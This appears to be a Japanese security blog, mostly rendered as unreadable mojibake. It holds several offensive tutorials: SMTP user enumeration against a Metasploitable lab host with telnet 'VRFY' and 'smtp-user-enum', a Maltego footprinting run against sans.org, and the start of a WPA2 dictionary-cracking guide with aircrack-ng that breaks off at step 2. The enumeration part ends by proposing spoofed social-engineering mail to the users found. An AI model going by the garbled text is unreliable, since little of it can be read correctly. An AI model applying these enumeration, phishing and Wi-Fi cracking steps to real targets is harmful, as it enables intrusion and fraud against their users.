¤´Â¸ÃΤΤ褦¤Ë¡¢SMTP¤Ï´Ê°×¥á¡¼¥ëžÁ÷¥×¥í¥È¥³¥ë¤Îά¤Ç¡¢¤½¤ì¤¾¤ì¥Ý¡¼¥È110¤ª¤è¤Ó143¤Çưºî¤·¡¢POP3¤ÈIMAP¤È¤Ï°Û¤Ê¤ê¡¢¥Ý¡¼¥È25¾å¤Çưºî¤·¡¢SMTP¤Ï¡¢¥µ¡¼¥Ð¡¼´Ö¤Î¥×¥í¥È¥³¥ë¤Ç¤¹¡£¥¯¥é¥¤¥¢¥ó¥È¤Ï¡¢SMTP¥µ¡¼¥Ð¤¬¡¢Â¾¤ÎSMTP¥µ¡¼¥Ð¡¼¤ÈÄÌ¿®¤·¤Ê¤¬¤é¡¢¼èÆÀ¤·¤¿¤ê¡¢SMTP¥µ¡¼¥Ð¡¼¤Ë¥á¥Ã¥»¡¼¥¸¤òÁ÷¿®¤¹¤ë¤¿¤á¤Ë¡¢POP3¤Þ¤¿¤ÏIMAP¤ò»ÈÍѤ·¤Æ¤¤¤Þ¤¹¡£
SMTP¥µ¡¼¥Ð¡¼¤ÏÅŻҥ᡼¥ë¤òÁ÷¼õ¿®¤¹¤ëɬÍפ¬¤¢¤ë¤³¤È¤òÁÈ¿¥Æâ¤Î¤¹¤Ù¤Æ¤ÎÅŻҥ᡼¥ë¥¢¥É¥ì¥¹¤Î¥Ç¡¼¥¿¥Ù¡¼¥¹¤ò°Ý»ý¤·¤Þ¤¹¡£»ä㤬¥¢¥¯¥»¥¹¤·¤Æ¡¢¾È²ñ¤·¤¿¤¤¥Ç¡¼¥¿¥Ù¡¼¥¹¤Ç¤¹¡£
SMTP¥µ¡¼¥Ð¡¼¤Ç¡¢¤¢¤Ê¤¿¤ÏNmap¤Þ¤¿¤ÏÊ̤ÎÁöºº¥Ä¡¼¥ë¤ò»È¤¤¡¢port25¤Ç¥µ¡¼¥Ð¡¼¤òÁܤ¹¤³¤È¤¬¤Ç¤­¤Þ¤¹¡£port25¤¬³«¤¤¤Æ¤¤¤ë¤Ê¤é¡¢¤½¤ì¤Ï¤ª¤½¤é¤¯SMTP¥µ¡¼¥Ð¤Ç¤¹¡£¤µ¤é¤Ë¡¢¤¢¤Ê¤¿¤Ï¤½¤ÎSMTP¥µ¡¼¥Ð¡¼¤ÎIP¥¢¥É¥ì¥¹¤ò¸«¤Ä¤±¤ë¤¿¤á¤Ë¡¢DNS¼ÁÌä¤òÍѤ¤¤ë¤³¤È¤¬¤Ç¤­¤Þ¤¹¡£

SMTP¥³¥Þ¥ó¥É

SMTP¥×¥í¥È¥³¥ë¤ÏÈó¾ï¤Ë¿¤¯¤Î¾¤Î¥×¥í¥È¥³¥ë¤ÈƱÍͤˡ¢¥³¥Þ¥ó¥É¤ÎÆÈ¼«¤Î¥µ¥Ö¥»¥Ã¥È¤òÍ­¤·¤Þ¤¹¡£¤³¤³¤ÇºÇ¤â½ÅÍפÊSMTP¥³¥Þ¥ó¥É¤Î¤Û¤ó¤Î°ìÉô¤Ç¤¹¡£
  • HELO -¤³¤ì¤Ï¡¢¥¯¥é¥¤¥¢¥ó¥È¤¬²ñÏäò³«»Ï¤¹¤ë¤¿¤á¤Ë¥µ¡¼¥Ð¤ËÁ÷¿®¤¹¤ë¥³¥Þ¥ó¥É¤Ç¤¹¡£°ìÈÌŪ¤Ë¤Ï¡¢IP¥¢¥É¥ì¥¹¤Þ¤¿¤Ï¥É¥á¥¤¥ó̾¤Ï¡¢HELO 192.168.101¤Þ¤¿¤ÏHELO client.microsoft.com¤Î¤è¤¦¤Ë¡¢¤³¤Î¥³¥Þ¥ó¥É¤òźÉÕ¤·¤Ê¤±¤ì¤Ð¤Ê¤ê¤Þ¤»¤ó¡£
  • EHLO -¤³¤Î¥³¥Þ¥ó¥É¤ÏHELO¤ÈƱ¤¸¤Ç¤¹¤¬¡¢¥¯¥é¥¤¥¢¥ó¥È¤¬³ÈÄ¥SMTP¤ò»ÈÍѤ·¤¿¤¤¥µ¡¼¥Ð¡¼¤ÈÄÌ¿®¤·¤Þ¤¹¡£¥µ¡¼¥Ð¤¬ESMTP¤òÄ󶡤·¤Æ¤¤¤Ê¤¤¾ì¹ç¤Ï¡¢¤½¤ì¤Ï¤Þ¤À¡¢¤³¤Î¥³¥Þ¥ó¥É¤òǧ¼±¤·¡¢Å¬ÀÚ¤ËÊÖ¿®¤·¤Þ¤¹¡£
  • STARTTLS -Ä̾ï¤ÏSMTP¥µ¡¼¥Ð¡¼¤¬Ê¿Ê¸¤ÇÄÌ¿®¤·¤Þ¤¹¡£¥»¥­¥å¥ê¥Æ¥£¤ò¸þ¾å¤µ¤»¤ë¤¿¤á¤Ë¡¢SMTP¥µ¡¼¥Ð¤È¤Î´Ö¤ÎÀܳ¤ÏTLS¡ÊTransport Layer Security¡Ë¤Ë¤è¤Ã¤Æ°Å¹æ²½¤¹¤ë¤³¤È¤¬¤Ç¤­¤Þ¤¹¡£¤³¤Î¥³¥Þ¥ó¥É¤Ï¡¢TLS¥»¥Ã¥·¥ç¥ó¤ò³«»Ï¤·¤Þ¤¹¡£
  • RCPT -¼õ¿®¼Ô¤ÎÅŻҥ᡼¥ë¥¢¥É¥ì¥¹¤ò»ØÄꤷ¤Þ¤¹¡£
  • DATA-¥á¥Ã¥»¡¼¥¸ÆâÍÆ¤ÎžÁ÷¤ò³«»Ï¤·¤Þ¤¹¡£
  • RSET -¸½ºß¤Î¥á¡¼¥ë¥È¥é¥ó¥¶¥¯¥·¥ç¥ó¤ò¥¢¥Ü¡¼¥È¤¹¤ë¤¿¤á¤Ë»ÈÍѤ·¤Þ¤¹¡£
  • MAIL -Á÷¿®¼Ô¤ÎÅŻҥ᡼¥ë¥¢¥É¥ì¥¹¤ò»ØÄꤷ¤Þ¤¹¡£
  • QUIT -Àܳ¤òÊĤ¸¤Þ¤¹¡£
  • HELP -¥Ø¥ë¥×²èÌÌ¡£
  • AUTH -¥µ¡¼¥Ð¤Ë¥¯¥é¥¤¥¢¥ó¥È¤òǧ¾Ú¤¹¤ë¤¿¤á¤Ë»ÈÍѤ·¤Þ¤¹¡£
  • VRFY -¸¡¾Ú¤¹¤ë¤¿¤á¤Î¥µ¡¼¥Ð¤¬ÅŻҥ᡼¥ë¤Î¥æ¡¼¥¶¡¼¤Î¥á¡¼¥ë¥Ü¥Ã¥¯¥¹¤¬Â¸ºß¤·¤Æ¤¤¤ë¤«¤É¤¦¤«¤ò¿Ò¤Í¤Þ¤¹¡£

¥¹¥Æ¥Ã¥×1¡§Kali¤ò³«¤­¡¢¥¿¡¼¥ß¥Ê¥ë¡ÊüËö¡Ë¤ò³«¤­¤Þ¤¹¡£

SMTP¤Î´ðËܤò¥«¥Ð¡¼¤·¤¿¤Î¤Ç¡¢ÅŻҥ᡼¥ë¥¢¥É¥ì¥¹¤ò¼è¤ê½Ð¤·¡¢SMTP¥µ¡¼¥Ð¡¼¤ò¥Ï¥Ã¥­¥ó¥°¤¹¤ë¤¿¤á¤Ë¡¢»ä㤬¤³¤ÎÃ챤òÍѤ¤¤ë¤³¤È¤¬¤Ç¤­¤ë¤«¤É¤¦¤«¤ò³Î¤«¤á¤Þ¤·¤ç¤¦¡£

¥¹¥Æ¥Ã¥×2¡§telnet

»ä¤¿¤Á¤Î¼¡¤Î¥¹¥Æ¥Ã¥×¤Ï¡¢²æ¡¹¤Ï¼êư¤ÇTelnet¤ò»ÈÍѤ·¤ÆSMTP¥µ¡¼¥Ð¡¼¤ËÀܳ¤Ç¤­¤ë¤«¤É¤¦¤«¤ò³Îǧ¤¹¤ë¤³¤È¤Ç¤¹¡£
  • kali > telnet 192.168.1.101 25
¤´Í÷¤Î¤è¤¦¤Ë¡¢²æ¡¹¤¬Àµ¾ï¤ËTelnet·ÐͳMetasploitable¥µ¡¼¥Ð¤ËÀܳ¤µ¤ì¤Æ¤¤¤Þ¤¹¡£

¥¹¥Æ¥Ã¥×3¡§¼êư¤ÇÅŻҥ᡼¥ë¥¢¥É¥ì¥¹¤ò»î¤¹

º£¡¢»ä¤¿¤Á¤ÏSMTP¥µ¡¼¥Ð¤Ëtelnet¤ò²ð¤·¤ÆÀܳ¤µ¤ì¤Æ¤¤¤ë¤³¤È¤ò¡¢»ä¤¿¤Á¤Ï¥µ¡¼¥Ð¡¼¤ò¾È²ñ¤¹¤ë¤¿¤á¤Ë¡¢¾åµ­¤ÎSMTP¥³¥Þ¥ó¥É¤ò»ÈÍѤ¹¤ë¤³¤È¤¬¤Ç¤­¤Þ¤¹¡£ºÇ¤â½ÅÍפʤΤϡ¢²æ¡¹¤ÏVRFY¥³¥Þ¥ó¥É¤ò»ÈÍѤ·¤Þ¤¹¡£ÅŻҥ᡼¥ë¤Î¥æ¡¼¥¶¡¼Ì¾¤ò³¤±¡¢¤³¤Î¥³¥Þ¥ó¥É¤ò»ÈÍѤ·¤Æ¡¢¥æ¡¼¥¶¡¼¥¢¥«¥¦¥ó¥È¤ò½ªÎ»¤¹¤ë¤«¤É¤¦¤«¤ò³Îǧ¤¹¤ë¤¿¤á¤Ë¥µ¡¼¥Ð¡¼¤¬Í׵ᤵ¤ì¤Þ¤¹¡£
  • > VRFY sys
¾å¤Î¥¹¥¯¥ê¡¼¥ó¥·¥ç¥Ã¥È¤Ç¸«¤ë¤³¤È¤¬¤Ç¤­¤ë¤è¤¦¤Ë¡¢¥Æ¥¹¥È¤·¤Æ¤ß¤Þ¤·¤¿¡£
  • sys
  • admin¡Ê´ÉÍý¼Ô¡Ë
  • administrator
  • nullbyte
  • root
¥µ¡¼¥Ð¡¼¡Ösys¡×¤È¡Öroot¡×¤Ï¡¢¥µ¡¼¥Ð¾å¤ÎÅŻҥ᡼¥ë¥¢¥«¥¦¥ó¥È¤ò»ý¤Ã¤Æ¤¤¤ë¤³¤È¤ò³Îǧ¤·¤Þ¤·¤¿¡ª

¥¹¥Æ¥Ã¥×4¡§Smtp-User-Enum¤ò»ÈÍѤ¹¤ë

¤¢¤Ê¤¿¤¬¥¹¥Æ¥Ã¥×¡ô3¤Ç¸«¤ë¤³¤È¤¬¤Ç¤­¤ë¤è¤¦¤Ë¡¢²æ¡¹¤Ï¼êư¤ÇÆÃÄê¤ÎÅŻҥ᡼¥ë¥¢¥É¥ì¥¹¤¬Â¸ºß¤¹¤ë¤«¤É¤¦¤«¤ò³Îǧ¤¹¤ëSMTP¥µ¡¼¥Ð¡¼¤ò¾È²ñ¤¹¤ë¤³¤È¤¬¤Ç¤­¤Þ¤¹¡£²æ¡¹¤Ï¼«Æ°Åª¤Ë¤³¤ì¤ò¤·¤¿¥¹¥¯¥ê¥×¥È¤ò»ý¤Ã¤Æ¤¤¤ì¤Ð¡¢´Êñ¤Ç¤Ï¤Ê¤¤¤Ç¤·¤ç¤¦¤«¡©¹¬±¿¤Ë¤â»äã¤Ï»ý¤Ã¤Æ¤¤¤Þ¤¹¡ª¤³¤ì¤Ï¡Ösmtp-user-enum¡×¤È¸Æ¤Ð¤ì¤Æ¤¤¤Æ¡¢Kali¤ËÁȤ߹þ¤Þ¤ì¤Æ¤¤¤Þ¤¹¡£¸«¤Ä¤±¤ë¤¿¤á¤Ë¡¢Applications -> Kali Linux -> Information Gathering - SMTP Analysis -> smtp-user-enum¤«¤é¸«¤Ä¤±¤ë¤³¤È¤¬¤Ç¤­¤Þ¤¹¡£
²æ¡¹¤Ï¤½¤ì¤ò¥¯¥ê¥Ã¥¯¤¹¤ë¤È¡¢°Ê²¼¤Î¤è¤¦¤Ê¥Ø¥ë¥×²èÌ̤¬É½¼¨¤µ¤ì¤Þ¤¹¡£E¥á¡¼¥ë¥æ¡¼¥¶¡¼¤ò¸«¤Ä¤±¤ë¤¿¤á¤Ë¤³¤Î¥Ä¡¼¥ë¤ò»ÈÍѤ¹¤ë¤¿¤á¤Î´ðËÜŪ¤Ê¹½Ê¸¤¬²¼µ­¤Ç¤¢¤ë¤³¤È¤ËÃí°Õ¤·¤Æ¤¯¤À¤µ¤¤¡§
  • kali > smtp-user-enum -M VRFY -U <userlist> -t <target IP>
¤½¤ì¤Ç¤Ï¡¢Metasploitable SMTP¥µ¡¼¥Ð¤ËÂФ·¤Æ»ÈÍѤ¹¤ë¥³¥Þ¥ó¥É¤ò¹½ÃÛ¤·¤Þ¤·¤ç¤¦¡£»äã¤ÏKali¤Îwordlist¤Î¤¦¤Á¤Î²¿¤Ç¤â»È¤¦¤³¤È¤¬¤Ç¤­¡¢»ä㼫¿È¤ÇºîÀ®¤¹¤ë¤«¡¢¥¤¥ó¥¿¡¼¥Í¥Ã¥È¤ÇÆþ¼ê²Äǽ¤Ê¿ôÀé¤Î¤¦¤Á¤Î²¿¤Ç¤â¥À¥¦¥ó¥í¡¼¥É¤¹¤ë¤³¤È¤â¤Ç¤­¤Þ¤¹¡£»ä¤ÏKali¤ËÁȤ߹þ¤Þ¤ì¤¿¤â¤Î¤ò»î¤·¤Æ¤ß¤ë¤³¤È¤Ë¤·¤Þ¤·¤¿¡§
  • /usr/share/fern-wifi-cracker/extras/wordlist
¤½¤ì¤ò»ÈÍѤ·¤Æ¡¢»ä¤Î¥³¥Þ¥ó¥É¤Ï¼¡¤Î¤è¤¦¤Ë¤Ê¤ê¤Þ¤¹¡£
  • kali > smtp-user-enum -M VRFY -U /usr/sharefern-wifi-cracker/extras/wordlist -t 192.168.1.101
¤¢¤Ê¤¿¤Ï²¼¤Î¥¹¥¯¥ê¡¼¥ó¥·¥ç¥Ã¥È¤Ç¸«¤ë¤³¤È¤¬¤Ç¤­¤ë¤è¤¦¤Ë¡¢²æ¡¹¤Ï¼Â¹Ô¤·¡¢ºÇ½é¤Î¥¹¥­¥ã¥ó¾ðÊó¤¬É½¼¨¤µ¤ì»Ï¤á¤Þ¤·¤¿¡£
¤½¤Î¸å¡¢¥æ¡¼¥¶¡¼¤òȯ¸«¤·¤Þ¤·¤¿¡£
º£¡¢»ä¤¿¤Á¤Ï¡¢¥æ¡¼¥¶¡¼¤¬¤½¤ÎÁÈ¿¥¤ÎÅŻҥ᡼¥ë¥µ¡¼¥Ð¡¼¾å¤Ë¤¢¤ë¤«ÃΤäƤ¤¤ë¤³¤È¤ò¡¢²æ¡¹¤ÏÈà¤é¤Ë¥½¡¼¥·¥ã¥ë¥¨¥ó¥¸¥Ë¥¢¥ê¥ó¥°¤Î¥á¡¼¥ë¤òÁ÷¿®¤·¤¿¤ê¡¢¼«Ê¬¤Î¥á¡¼¥ë¥¢¥É¥ì¥¹¤òµ¶Áõ¤·¡¢¤½¤ÎƱν¤Ë¥½¡¼¥·¥ã¥ë¥¨¥ó¥¸¥Ë¥¢¥ê¥ó¥°¤ÎÅŻҥ᡼¥ë¤òÁ÷¿®¤¹¤ë¤³¤È¤¬¤Ç¤­¤Þ¤¹¡£

¤³¤Îµ­»ö¤Ë

³«¤¯¥³¥á¥ó¥È¡Ê0¡Ë¢¨Åê¹Æ¤µ¤ì¤¿¥³¥á¥ó¥È¤Ï¥Ö¥í¥°³«À߼ԤξµÇ§¸å¤Ë¸ø³«¤µ¤ì¤Þ¤¹¡£

³«¤¯¥È¥é¥Ã¥¯¥Ð¥Ã¥¯¡Ê0¡Ë¢¨¥È¥é¥Ã¥¯¥Ð¥Ã¥¯¤Ï¥Ö¥í¥°³«À߼ԤξµÇ§¸å¤Ë¸ø³«¤µ¤ì¤Þ¤¹¡£

Maltego¤Ï¡¢¥Í¥Ã¥È¥ï¡¼¥¯¤Þ¤¿¤Ï¸Ä¡¹¤Î¤¤¤º¤ì¤«¤Ë´Ø¤¹¤ë¾ðÊó¤ò¼ý½¸¤¹¤ë¤³¤È¤¬¤Ç¤­¤Þ¤¹¡£¤³¤³¤Ç¤ÏÁ°¼Ô¤Ë¾ÇÅÀ¤òÅö¤Æ¡¢Ê̤λþ´Ö¤Î¤¿¤á¤Ë¼ý½¸¤·¤¿Whois¾ðÊó¤ò»Ä¤·¤Þ¤¹¡£²æ¡¹¤Ï¡¢¤¹¤Ù¤Æ¤Î¥µ¥Ö¥É¥á¥¤¥ó¡¢IP¥¢¥É¥ì¥¹Èϰϡ¢¸Ä¿Í¾ðÊó¡¢ÅŻҥ᡼¥ë¥¢¥É¥ì¥¹¤Î¤¹¤Ù¤Æ¡¢¤ª¤è¤Ó¥¿¡¼¥²¥Ã¥È·¥É¥á¥¤¥ó¤Ê¤É¤Î´Ø·¸¤Ë¤Ä¤¤¤Æ¤Î¾ðÊó¤ò¼ý½¸¤¹¤ë¤³¤È¤¬²Äǽ¤Ë¤Ê¤ê¤Þ¤¹¡£

¥¹¥Æ¥Ã¥×1¡§Maltego¤ò³«¤­¡¢ÅÐÏ¿¤¹¤ë


Kali Linux¤òµ¯Æ°¤·¡¢Maltego¤ò³«¤­¤Þ¤¹¡£Maltego¤ÏKali¤Ç¿¤¯¤Î¾ì½ê¤Ç¸«¤Ä¤±¤ë¤³¤È¤¬¤Ç¤­¤Þ¤¹¤¬¡¢¤½¤ì¤òºÇ¤â´Êñ¤Ê¸«¤Ä¤±Êý¤ÏApplications -> Kali Linux -> Top 10 Security Tools¤«¤é¸«¤Ä¤±¤ëÊýË¡¤Ç¤¹¡£²¼¤Î¥¹¥¯¥ê¡¼¥ó¥·¥ç¥Ã¥È¤Ë¼¨¤¹¤è¤¦¤Ë¡¢¥È¥Ã¥×10¤Î¸ÞÈÖÌܤËMaltego¤¬¤¢¤ê¤Þ¤¹¡£
¤¢¤Ê¤¿¤¬Maltego¤ò³«¤¯¤È¡¢¤¢¤Ê¤¿¤Ï¤½¤ì¤¬µ¯Æ°¤¹¤ë¤Î°ì½Ö¤òÂÔ¤ÄɬÍפ¬¤¢¤ê¤Þ¤¹¡£¤½¤ì¤ÏÆÉ¤ß¹þ¤ß¤¬´°Î»¤·¤¿¤é¡¢Maltego¤òÅÐÏ¿¤¹¤ë¤è¤¦¤Ëµá¤á¤ë²èÌ̤ˤè¤Ã¤Æ·Þ¤¨¤é¤ì¤ë¤Ç¤·¤ç¤¦¡£
¼¡¤ËMaltego¤Ë¥í¥°¥¤¥ó¤¹¤ë¤È¤­¡¢¥Ñ¥¹¥ï¡¼¥É¤òÅÐÏ¿¤·¡¢³Ð¤¨¤µ¤»¤Æ¤ª¤¤¤Æ¤¯¤À¤µ¤¤¡£

¥¹¥Æ¥Ã¥×2¡§¥Þ¥·¥ó¡õ¥Ñ¥é¥á¡¼¥¿¤òÁªÂò¤·¤Æ¤¯¤À¤µ¤¤

Maltego¤Ë¤Ä¤¤¤Æ¼óÈø¤è¤¯ÅÐÏ¿¤·¡¢¥í¥°¥¤¥ó¤·¤¿¸å¤Ë¡¢»äã¤Ï¤É¤ó¤Ê¥¿¥¤¥×¤¬¥¿¡¼¥²¥Ã¥È¤È¾×ÆÍ¤·¤Æ¤Û¤·¤¤¤«¤ò·è¤á¤ëɬÍפ¬¤¢¤ê¤Þ¤¹¡£Maltego¤ÎÍѸì¤Ç¤Ï¡¢¥Þ¥·¥ó¤Ï»ä㤬»äã¤ÎÌÜɸ¤ËÂФ·¤Æ²¿¤ò¤·¤¿¤¤¥Õ¥Ã¥È¥×¥ê¥ó¥Æ¥£¥ó¥°¤É¤Î¥¿¥¤¥×¤Îñ½ã¤Ç¤¢¤ë¡£¤³¤³¤Ç¤Ï¡¢¥Í¥Ã¥È¥ï¡¼¥¯¥Õ¥Ã¥È¥×¥ê¥ó¥È¤Ë¾ÇÅÀ¤òÅö¤Æ¤Æ¤¤¤ë¤Î¤Ç¡¢»ä¤¿¤Á¤ÎÁªÂò»è¤Ï¼¡¤Î¤È¤ª¤ê¤Ç¤¹¡£
  • Company Stalker¡ÊÅŻҥ᡼¥ë¾ðÊó¤ò¼ý½¸¤·¤Þ¤¹¡£¡Ë
  • Footprint L1   ¡Ê´ðËܾðÊó¼ý½¸¡Ë
  • Footprint L2   ¡ÊŬÅÙ¤ÊÎ̤ξðÊó¼ý½¸¡Ë
  • Footprint L3   ¡Ê¶¯Îõ¤Ç¤¢¤ë¤³¤È¤ª¤è¤ÓºÇ¤â´°Á´¤Ê¾ðÊó¼ý½¸¡Ë
²æ¡¹¤Ï¤Ç¤­¤ë¸Â¤ê¿¤¯¤Î¾ðÊó¤ò¼ý½¸¤·¤Þ¤¹L3¥Õ¥Ã¥È¥×¥ê¥ó¥È¤òÁªÂò¤·¤Þ¤·¤ç¤¦​​¡£¤³¤ì¤Ï¤Þ¤¿ºÇ¤â»þ´Ö¤Î¤«¤«¤ë¥ª¥×¥·¥ç¥ó¤Ç¤¹¡£

¥¹¥Æ¥Ã¥×3¡§¥¿¡¼¥²¥Ã¥È¤òÁªÂò¤¹¤ë

º£¡¢»ä¤¿¤Á¤Ï»ä¤¿¤Á¤Î¥Õ¥Ã¥È¥×¥ê¥ó¥È¤Î¤¿¤á¤Ë¥Þ¥·¥ó¤Î¥¿¥¤¥×¤òÁªÂò¤·¤¿¸å¤Ï¡¢¥¿¡¼¥²¥Ã¥È¤òÁªÂò¤¹¤ëɬÍפ¬¤¢¤ê¤Þ¤¹¡£¼çÍפÊIT¥»¥­¥å¥ê¥Æ¥£·±Îý¤Î¤¦¤Á¤Î1²ó¤ª¤è¤ÓÀ¤³¦¤Î¥³¥ó¥µ¥ë¥¿¥ó¥È²ñ¼Ò¤Ç¤¢¤ëSANS¤òÁª¤Ó¤Þ¤·¤ç¤¦¡£
¡ÖFinish¡×¤ò¥¯¥ê¥Ã¥¯¤·¤Æ¡¢Maltego¤Ë¤½¤Î»Å»ö¤ò¤µ¤»¤Þ¤¹¡£

¥¹¥Æ¥Ã¥×4¡§·ë²Ì

Maltego¤Ï¸½ºß¡¢»ä¤¿¤Á¤Î¥¿¡¼¥²¥Ã¥È¥É¥á¥¤¥ó¡¢sans.org¾å¤Î¾ðÊó¤ò¼ý½¸¤¹¤ë¤¿¤á¤Ë³«»Ï¤·¡¢²èÌ̤Ëɽ¼¨¤µ¤ì¤Þ¤¹¡£²¼¤Î¥¹¥¯¥ê¡¼¥ó¥·¥ç¥Ã¥È¤Ç¤Ï¡¢²æ¡¹¤Ï¤½¤ì¤¬¥Í¡¼¥à¥µ¡¼¥Ð¤ä¥á¡¼¥ë¥µ¡¼¥Ð¤ò¼ý½¸¤·¤Ê¤¬¤é¡¢Maltego¤Ï´û¤Ë¡¢¥µ¥¤¥È¤«¤éÅŻҥ᡼¥ë¥¢¥É¥ì¥¹¤ò¼ý½¸¤·¤Æ¤¤¤ë¤³¤È¤¬¤ï¤«¤ê¤Þ¤¹¡£
ºÇ¸å¤ËMaltego¤¬¹Ô¤ï¤ì¤¿¤È¤­¡¢¡ÖBubble View¡×¤ò¥¯¥ê¥Ã¥¯¤·¤Æ¡¢»ä¤¿¤Á¤Î¥¿¡¼¥²¥Ã¥È¤È¤½¤Î¥µ¥Ö¥É¥á¥¤¥ó¤È¥ê¥ó¥¯Àè¤Î¥µ¥¤¥È´Ö¤Î´Ø·¸¤Î¤¹¤Ù¤Æ¤ò¸«¤ë¤³¤È¤¬¤Ç¤­¤Þ¤¹¡£
Maltego¤Ï»äã¤ÎÀøºßŪ¤ÊÌÜɸ¤Î¥Í¥Ã¥È¥ï¡¼¥¯Ä廡¤ò¤¹¤ëÍ¥½¨¤Ê¥Ä¡¼¥ë¤Ç¤¢¤ê¡¢Ã±°ì¤ÎÄ´ºº¤Ë¤ª¤¤¤ÆÃ±°ì¤Î¥Ä¡¼¥ë¤ÇÄ廡¤Î¿¿ô¤Î¥¿¥¤¥×¤òÁªÂò¤¹¤ë¤³¤È¤ò²Äǽ¤Ë¤·¤Þ¤¹¡£

Á°¥Ö¥í¥°¤è¤ê

¤³¤Îµ­»ö¤Ë

³«¤¯¥³¥á¥ó¥È¡Ê0¡Ë¢¨Åê¹Æ¤µ¤ì¤¿¥³¥á¥ó¥È¤Ï¥Ö¥í¥°³«À߼ԤξµÇ§¸å¤Ë¸ø³«¤µ¤ì¤Þ¤¹¡£

³«¤¯¥È¥é¥Ã¥¯¥Ð¥Ã¥¯¡Ê0¡Ë¢¨¥È¥é¥Ã¥¯¥Ð¥Ã¥¯¤Ï¥Ö¥í¥°³«À߼ԤξµÇ§¸å¤Ë¸ø³«¤µ¤ì¤Þ¤¹¡£

¡¡¡¡¡¡Ãí¡ËÁ°¥Ö¥í¥°¤Ë¤Æ¡¢¤«¤Ê¤êÁ°¤Ëºî¤Ã¤¿µ­»ö¤ò¾¯¤·½¤Àµ¤·¤¿¤â¤Î¤Ê¤Î¤ÇKali¤Ç¤Ï¤Ê¤¯BackTrack¤ò»È¤Ã¤Æ¤¤¤Þ¤¹¡£


aircrack-ng¡¦¡¦¡¦WEP¤ÈWPA¥¯¥é¥Ã¥¯¤Î¥­¡¼Áàºî¤Ë¤è¤ë¼­½ñ¹¶·â¡£


Wi-Fi¤¬1990ǯÂå¤Î½ª¤ï¤ê¤ËºÇ½é¤Ë³«È¯¤µ¤ì¤¿»þ¡¢Wired Equivalent Privacy¤Ï̵ÀþÄÌ¿®¤Ëµ¡Ì©À­¤òÍ¿¤¨¤ë¤¿¤á¤ËºîÀ®¤µ¤ì¤Þ¤·¤¿¡£WEP¤Ï¤Ò¤É¤¯·ç´Ù¤¬¤¢¤ë¤ÈÃΤé¤ì¤ë¤è¤¦¤Ë¤Ê¤Ã¤Æ¤«¤éÍÆ°×¤Ë²òÆÉ¤Ç¤­¤ë¤è¤¦¤Ë¤Ê¤ê¤Þ¤·¤¿¡£

ÂåÂØ¤È¤·¤Æ¡¢¤Û¤È¤ó¤É¤Î¥ï¥¤¥ä¥ì¥¹¥¢¥¯¥»¥¹¥Ý¥¤¥ó¥È¤Ï¸½ºß¡¢WPA2-PSK¤È¤â¸Æ¤Ð¤ì¤ë¥ï¥¤¥ä¥ì¥¹¥»¥­¥å¥ê¥Æ¥£¤Î¤¿¤á¤Î»öÁ°¶¦Í­¥­¡¼¤ò»ÈÍѤ·¤ÆWi-Fi¤òÊݸ¤ì¤¿¥¢¥¯¥»¥¹II¤ò»ÈÍѤ·¤Æ¤¤¤Þ¤¹¡£WPA2¤Ï¤è¤ê¶¯¤¤°Å¹æ²½¥¢¥ë¥´¥ê¥º¥à¤ò»ÈÍѤ·¤Þ¤¹¡£AES¡¢¤½¤ì¤Ï²òÆÉ¤¬Èó¾ï¤ËÆñ¤·¤¤¤Ç¤¹¡£¤·¤«¤·ÉÔ²Äǽ¤Ç¤Ï¤¢¤ê¤Þ¤»¤ó¡£

WPA2-PSK¥·¥¹¥Æ¥à¤Î¼å¤µ¤Ï¡¢°Å¹æ²½¤µ¤ì¤¿¥Ñ¥¹¥ï¡¼¥É¤¬4-way handshake¤È¤·¤ÆÃΤé¤ì¤Æ¤¤¤ë¤â¤Î¤ÎÃæ¤Ç¶¦Í­¤µ¤ì¤Æ¤¤¤Þ¤¹¡£
¥¯¥é¥¤¥¢¥ó¥È¤¬¥¢¥¯¥»¥¹¥Ý¥¤¥ó¥È¡ÊAP¡Ë¤Ëǧ¾Ú¤¹¤ë¤È¡¢¥¯¥é¥¤¥¢¥ó¥È¤ÈAP¤Ï¡¢AP¤Ë¥æ¡¼¥¶¤òǧ¾Ú¤¹¤ë¤¿¤á¤Ë4Ãʳ¬¤Î¥×¥í¥»¥¹¤ò·Ð¤ë¡£²æ¡¹¤Ï¡¢¤½¤Î»þÅÀ¤Ç¥Ñ¥¹¥ï¡¼¥É¤ò¤Ä¤«¤à¤³¤È¤¬¤Ç¤­¤ì¤Ð¡¢²æ¡¹¤Ï¤½¤ì¤ò¥¯¥é¥Ã¥¯¤ò»î¤ß¤ë¤³¤È¤¬¤Ç¤­¤Þ¤¹¡£

¤³¤Î¥Á¥å¡¼¥È¥ê¥¢¥ë¤Ç¤Ï»ä¤¿¤Á¤Ï4-way handshake¤Ç¤½¤ì¤ò¤Ä¤«¤ó¤À¸å¤Ë°Å¹æ²½¤µ¤ì¤¿¥Ñ¥¹¥ï¡¼¥É¾å¤Çaircrack-ng¤ª¤è¤Ó¼­½ñ¹¶·â¤ò»ÈÍѤ·¤Þ¤¹¡£

¥¹¥Æ¥Ã¥×1¡§Airmon-ng¤Î¥â¥Ë¥¿¥â¡¼¥É¤Ç¤ÎWi-Fi¥¢¥À¥×¥¿¤òÆþ¤ì¤ë

¥â¥Ë¥¿¥â¡¼¥É¤Ç»ä¤¿¤Á¤Î¥ï¥¤¥ä¥ì¥¹¥¢¥À¥×¥¿¤òÃÖ¤¯¤³¤È¤«¤é»Ï¤á¤Æ¤ß¤Þ¤·¤ç¤¦¡£¤³¤ì¤Ï̵º¹Ê̥⡼¥É¤ËÍ­Àþ¥¢¥À¥×¥¿¤òÃÖ¤¯¤Ë»÷¤Æ¤¤¤Þ¤¹¡£¤½¤ì¤Ï¡¢»ä¤¿¤Á¤¬¶õµ¤¤Ç»ä¤¿¤Á¤òÄ̲᤹¤ë̵Àþ¥È¥é¥Õ¥£¥Ã¥¯¤Î¤¹¤Ù¤Æ¤ò¸«¤ë¤³¤È¤¬¤Ç¤­¤Þ¤¹¡£¤½¤ì¤Ç¤Ï¡¢Ã¼Ëö¤È¥¿¥¤¥×¤ò³«¤­¤Þ¤·¤ç¤¦¡§
  • airmon-ng start wlan0
airmon-ng¤¬¤¢¤Ê¤¿¤Îwlan0¥¢¥À¥×¥¿¡¼¤òmon0¤Ë²þ̾¤·¤¿¤³¤È¤ËÃí°Õ¤·¤Æ¤¯¤À¤µ¤¤¡£

¥¹¥Æ¥Ã¥×2¡§Airodump-ng¤Î¥È¥é¥Õ¥£¥Ã¥¯¤ò¥­¥ã¥×¥Á¥ã

